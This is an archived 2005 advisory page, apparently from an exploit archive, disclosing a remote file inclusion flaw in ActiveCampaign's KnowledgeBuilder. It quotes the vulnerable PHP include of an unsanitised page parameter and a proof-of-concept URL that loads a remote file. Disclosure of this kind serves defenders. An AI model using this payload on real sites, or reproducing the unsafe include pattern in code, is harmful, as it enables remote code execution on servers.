knowledgeBuilder.txt

knowledgeBuilder.txt: Posted Mar 17, 2005; Authored by Dominus Vis; KnowledgeBuilder from ActiveCampaign Inc. is susceptible to a remote file inclusion flaw.; tags | exploit, remote, file inclusion; SHA-256 | 7a70517503b544dbdc87e341bc61d1201e86d5f63399caa8fcef9bb18c32415f; Download | Favorite | View

knowledgeBuilder.txt



Remote File Inclusion

KnowledgeBase
Vendor: www.activecampaign.com/kb/

Well, inside the index.php file we can see:

if ($page == ""){
 $page = "startup";
}
 @include("$page.php");
?>

After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]

Dominus_Vis
[Infektion Group]

Top Authors In Last 30 Days

Red Hat 132 files
Ubuntu 84 files
indoushka 33 files
Debian 26 files
Gentoo 17 files
nu11secur1ty 15 files
Apple 13 files
LiquidWorm 9 files
Google Security Research 7 files
jheysel-r7 4 files

File Archives

Systems

AIX (428)
Apple (2,016)
BSD (375)
CentOS (57)
Cisco (1,925)
Debian (6,851)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,339)
HPUX (879)
iOS (355)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (46,852)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,926)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,949)
UNIX (9,319)
UnixWare (186)
Windows (6,590)
Other

knowledgeBuilder.txt

knowledgeBuilder.txt

File Archive:

October 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

knowledgeBuilder.txt

Share This

knowledgeBuilder.txt

File Archive:

October 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems